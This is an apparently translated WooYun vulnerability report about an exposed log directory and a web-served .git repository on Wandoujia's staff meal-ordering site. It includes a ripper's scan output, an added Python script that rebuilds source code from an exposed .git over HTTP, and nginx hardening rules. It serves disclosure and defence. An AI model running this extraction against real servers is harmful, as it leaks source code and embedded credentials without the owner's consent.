WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --- http://drop.zone.ci/
2015-02-10: Details sent to the vendor, awaiting handling.
2015-02-10: Vendor has confirmed; details disclosed to the vendor only.
2015-02-18: Vendor has fixed the vulnerability and chose to disclose it; details are now public.
Misconfiguration leading to unauthorized access
Site: fan.wandoulabs.com is Wandoujia's employee meal-ordering platform (it should count as an internal platform, so why is it reachable from the public internet?)
#1. Unauthorized access to the log directory
http://fan.wandoulabs.com/log
http://fan.wandoulabs.com/api/rank
http://fan.wandoulabs.com/api/data/%E8%B5%9B%E7%99%BE%E5%91%B3%28%E8%A5%BF%E5%B0%8F%E5%8F%A3%29
Visiting these returns Unicode-escaped data; decoding it shows that lunch includes snow pear, white fungus and lily bulb congee, smooth steamed egg custard and so on. The food is not bad!
#2. Git hosting service misconfigured
http://uowechat.wandoujia.com/.git/config
The link above is reachable without authorization, which means the whole repository's source code can be enumerated and pulled down. Running a perl script to automate the enumeration gives:
D:\>perl 1.pl -v -u http://fan.wandoulabs.com/.git
[i] Downloading git files from http://fan.wandoulabs.com/.git
[!] Not found for COMMIT_EDITMSG: 404 Not Found
[d] found config
[d] found description
[d] found HEAD
[d] found index
[d] found packed-refs
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[!] Not found for objects/22/c454f74f434bc3303c5538825b5528adb10f36: 404 Not Found
[d] found objects/6f/858fe11be5607433e63f2ca91b39089ac3940e
[d] found objects/16/55132c58f76fa46457ce4987c65de2051b2539
[d] found objects/50/3563d459e2ba0d5ef7b74b2b9555a20cef408b
[d] found objects/44/cdfce8beb9129c0986b6903000cedf07b70297
[d] found objects/da/92170fdf2a71d6a40453d71763ce23218088dc
[d] found objects/d2/02abe5e479b5bad632ceef0b8e1b3ca7f5b83e
[d] found objects/81/9a3ce8b2df290cacda94d2ca0467d6c4c568ed
[d] found objects/5f/c5c945f29951813c669cf6f358a28d8dadb888
[d] found objects/bc/2597a3cd290668ae39c15b96d6e50ffdb02358
[d] found objects/29/885214c8a90a7a75bfbac743d8ee9e9b944d52
[d] found objects/44/6bd616618caffb2248c4fefbd3c221c2c33c4c
[d] found objects/0a/ee1372e64dff6cfc61e57075d19869c6f730d3
[d] found objects/ab/f8acb45ed99e5c695db70c3710dce8eb65b8b3
[d] found objects/83/11801845758c1e01b40b8979489d194ebd28f7
[d] found objects/78/3d646e3c583b9cdbec38fc4b08473a9a9e4668
[d] found objects/64/a78a2bdc0f16d3638218822976c6f2f4857a12
[d] found objects/e7/f62e4cae87091ca6619573ff3c5bbec545e7a6
[d] found objects/57/06af10f2a2d4505571a696cee5cfa805c90e08
[d] found objects/ca/be86f69713ca678f55e0a8672a0243ee702b15
[d] found objects/44/b7ab3bab31d40485fe67d295c1496033d76c21
[d] found refs/heads/master
[i] Running git fsck to check for missing items
1. /refs/heads/master:
2. /logs/HEAD
3. objects/44/b7ab3bab31d40485fe67d295c1496033d76c21
I won't prove the rest one by one. Exploitation:
git reset --hard
restores the whole site from the downloaded repository.
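What the ripper plus `git reset --hard` actually does, as an added example (this is not the reporter's 1.pl, nor Wandoujia code): read HEAD, resolve the branch through the loose ref or packed-refs, inflate the commit, walk its tree and write out every blob, recording any object the server refuses to hand over (the 404 on objects/22/c454... in the scan is exactly that case, which is why the script ends with `git fsck`). The `fetch` callable stands in for HTTP; the demo runs against a constructed in-memory store so it works offline, and swapping in `urllib.request` against `http://host/.git/` gives the real thing, which you only run with permission.

```python
# Added example (not the reporter's 1.pl): rebuild a working tree from a web-exposed
# .git directory the way a ripper followed by `git reset --hard` does.
# Walk: HEAD -> refs/heads/<branch> (or packed-refs) -> commit -> tree -> blobs.
# `fetch(path)` returns the bytes at /.git/<path> or None on 404; the demo uses a
# constructed in-memory repo so it runs offline.
import hashlib
import re
import zlib
from typing import Callable, Dict, List, Optional, Tuple

Fetch = Callable[[str], Optional[bytes]]


def hash_object(kind: bytes, data: bytes) -> bytes:
    """Git object id: SHA-1 over '<kind> <len>\\0<data>' (raw 20 bytes)."""
    return hashlib.sha1(kind + b" " + str(len(data)).encode() + b"\0" + data).digest()


def read_object(fetch: Fetch, sha: str) -> Optional[Tuple[bytes, bytes]]:
    """Fetch objects/xx/yyyy, inflate, split header; None if 404, corrupt or id mismatch."""
    raw = fetch(f"objects/{sha[:2]}/{sha[2:]}")
    if raw is None:
        return None
    try:
        body = zlib.decompress(raw)
    except zlib.error:
        return None
    header, _, data = body.partition(b"\0")
    kind, _, size = header.partition(b" ")
    if int(size) != len(data) or hashlib.sha1(body).hexdigest() != sha:
        return None
    return kind, data


def resolve_head(fetch: Fetch) -> Optional[str]:
    """HEAD is 'ref: refs/heads/x' or a bare id; resolve via the loose ref, then packed-refs."""
    head = (fetch("HEAD") or b"").strip().decode(errors="replace")
    if re.fullmatch(r"[0-9a-f]{40}", head):
        return head
    if not head.startswith("ref: "):
        return None
    ref = head[5:]
    loose = fetch(ref)
    if loose is not None:
        return loose.strip().decode()
    for line in (fetch("packed-refs") or b"").decode().splitlines():
        if line.endswith(" " + ref):
            return line.split(" ", 1)[0]
    return None


def parse_tree(data: bytes):
    """Yield (mode, name, id) from '<mode> <name>\\0<20-byte id>' entries."""
    i = 0
    while i < len(data):
        nul = data.index(b"\0", i)
        mode, name = data[i:nul].decode().split(" ", 1)
        yield mode, name, data[nul + 1:nul + 21].hex()
        i = nul + 21


def rip(fetch: Fetch) -> Tuple[Dict[str, bytes], List[str]]:
    """Return ({path: content} for HEAD's tree, [object ids the server did not serve])."""
    files: Dict[str, bytes] = {}
    missing: List[str] = []
    commit_id = resolve_head(fetch)
    commit = read_object(fetch, commit_id) if commit_id else None
    if commit is None or commit[0] != b"commit":
        return files, [commit_id or "HEAD"]
    tree_id = commit[1].split(b"\n", 1)[0].split(b" ")[1].decode()

    def walk(tid: str, prefix: str) -> None:
        tree = read_object(fetch, tid)
        if tree is None:
            missing.append(tid)
            return
        for mode, name, child in parse_tree(tree[1]):
            if mode.startswith("40"):          # 40000 = subdirectory
                walk(child, prefix + name + "/")
            elif (blob := read_object(fetch, child)) is None:
                missing.append(child)         # the 404 case seen in the scan above
            else:
                files[prefix + name] = blob[1]

    walk(tree_id, "")
    return files, missing


def build_sample_repo() -> Dict[str, bytes]:
    """Constructed loose-object store (not real Wandoujia data): one commit, one 404 object."""
    store: Dict[str, bytes] = {}

    def put(kind: bytes, data: bytes) -> bytes:
        oid = hash_object(kind, data).hex()
        store[f"objects/{oid[:2]}/{oid[2:]}"] = zlib.compress(
            kind + b" " + str(len(data)).encode() + b"\0" + data)
        return bytes.fromhex(oid)

    cfg = put(b"blob", b"DB_PASSWORD = 'example-secret'\n")
    app = put(b"blob", b"print('hello')\n")
    src = put(b"tree", b"100644 app.py\0" + app)
    lost = hashlib.sha1(b"never uploaded").digest()   # referenced but never served
    root = put(b"tree", b"100644 config.py\0" + cfg + b"100644 lost.txt\0" + lost
               + b"40000 src\0" + src)
    commit = put(b"commit", b"tree " + root.hex().encode()
                 + b"\nauthor a <a@x> 0 +0000\ncommitter a <a@x> 0 +0000\n\nmsg\n")
    store["HEAD"] = b"ref: refs/heads/master\n"
    store["packed-refs"] = commit.hex().encode() + b" refs/heads/master\n"
    return store


if __name__ == "__main__":
    files, missing = rip(build_sample_repo().get)
    print(files, "missing:", missing)
```

Two details matter in practice. The id check in `read_object` rejects objects that were truncated or served as an error page with a 200 status, so a partial download shows up in `missing` rather than as garbage in the tree. And when directory listing is off (the usual case, as the scan's per-file 404s suggest), the blob ids only come from walking trees and from `index`, so a repository with history in packfiles needs the `objects/pack/*.idx` files as well; this walker covers loose objects, which is what the scan output above shows.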
Configure the web server properly (stop serving the .git and log directories).
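One concrete form of "configure the site properly", as an added example rather than the vendor's actual fix: the weak state is simply a document root that contains .git and log/ with no location rules, so nginx serves them as static files. The rules below close both holes and, since the page describes an employee-only platform, also restrict the app to an assumed internal range (10.0.0.0/8 is a placeholder).

```nginx
# Added example, not Wandoujia's configuration. Weak setting: no rules at all, so
# /.git/HEAD and /log/ are served straight from disk. Hardened setting:
server {
    # ... listen / server_name / root as before ...

    # Never serve VCS metadata. 404 rather than 403 so the directory's
    # presence is not confirmed to a scanner.
    location ~ /\.(git|svn|hg)(/|$) {
        return 404;
    }

    # The raw log directory is not a web resource.
    location ^~ /log/ {
        return 404;
    }

    # Employee-only app: assumed office range, everything else refused.
    location / {
        allow 10.0.0.0/8;
        deny all;
        # proxy_pass / try_files as before
    }
}
```

Verify with `curl -sI http://host/.git/HEAD` and `curl -sI http://host/log/` after a reload; both should return 404. The blocking rule is a backstop: the durable fix is to deploy with `git archive` or a build artifact so .git never lands in the document root in the first place.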
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-02-10 10:31
Handled together with the previous vulnerability. Thanks for helping with Wandoujia's security.
2015-02-18: Fixed.